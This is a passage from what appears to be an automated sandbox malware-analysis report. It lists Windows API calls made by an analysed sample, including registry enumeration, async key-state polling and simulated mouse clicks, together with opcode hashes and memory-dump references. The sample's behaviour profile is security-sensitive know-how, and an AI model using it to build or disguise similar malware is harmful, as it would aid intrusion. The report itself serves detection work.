                                                                              • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                                                                              • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                              • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                                              • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                                              • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                                                              • __swprintf.LIBCMT ref: 0046ACC1
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu
                                                                              • API String ID: 3164766367-685833217
                                                                              • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                              • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                                                              • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                                              • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: CounterPerformanceQuerySleep
                                                                              • String ID: @F
                                                                              • API String ID: 2875609808-2781531706
                                                                              • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                              • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                                              • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                                              • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02F53F73,00000003,?,02F53F13,00000003,02F6DE80,0000000C,02F5403D,00000003,00000002), ref: 02F53FE2
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02F53FF5
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,02F53F73,00000003,?,02F53F13,00000003,02F6DE80,0000000C,02F5403D,00000003,00000002,00000000), ref: 02F54018
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: c758df239733b6ed16a3d958ebe15a2acd145e33e304e6be494a58bb46863588
                                                                              • Instruction ID: 5b715958c2dae615bf60106bcc6aadf86e38dba6ddf47871c0a54b63a4d20775
                                                                              • Opcode Fuzzy Hash: c758df239733b6ed16a3d958ebe15a2acd145e33e304e6be494a58bb46863588
                                                                              • Instruction Fuzzy Hash: 68F04430D5022CBBDB119F54DC09BADFFB5EF44795F100154EA05A2150DB759AA4DA90
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                                                              • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                              • String ID:
                                                                              • API String ID: 2364364464-0
                                                                              • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                              • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                                                              • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                                              • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 1559183368-0
                                                                              • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                              • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                                                              • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                              • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                              • String ID:
                                                                              • API String ID: 3440857362-0
                                                                              • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                              • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                                                              • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                              • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1389676194-0
                                                                              • Opcode ID: 10ab2eeef8adcc44359a8ee01b2fef8424208ef58ee2c6d12ded2a6122cd55a8
                                                                              • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                                                              • Opcode Fuzzy Hash: 10ab2eeef8adcc44359a8ee01b2fef8424208ef58ee2c6d12ded2a6122cd55a8
                                                                              • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                              • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                                                              • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                              • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00402357
                                                                              • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                              • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                              • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                              • String ID:
                                                                              • API String ID: 4210589936-0
                                                                              • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                              • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                                                              • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                              • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                                              • TranslateMessage.USER32(?), ref: 0045645C
                                                                              • DispatchMessageW.USER32(?), ref: 00456466
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                              • String ID:
                                                                              • API String ID: 2108273632-0
                                                                              • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                              • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                                                              • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                              • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00458A30
                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleep$RectWindow
                                                                              • String ID:
                                                                              • API String ID: 3382505437-0
                                                                              • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                              • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                                                              • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                              • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 0045B204
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                                              • _wcsstr.LIBCMT ref: 0045B289
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                              • String ID:
                                                                              • API String ID: 3902887630-0
                                                                              • Opcode ID: 7c40135c3822cb45ac7c15643312732e8ceefee4f86ea2214e9f9867610103ed
                                                                              • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                                                              • Opcode Fuzzy Hash: 7c40135c3822cb45ac7c15643312732e8ceefee4f86ea2214e9f9867610103ed
                                                                              • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                                                              APIs
                                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                                                              • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 2294984445-0
                                                                              • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                              • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                                                              • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                              • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
• __itow.LIBCMT ref: 0045936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
• __itow.LIBCMT ref: 004593A3
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
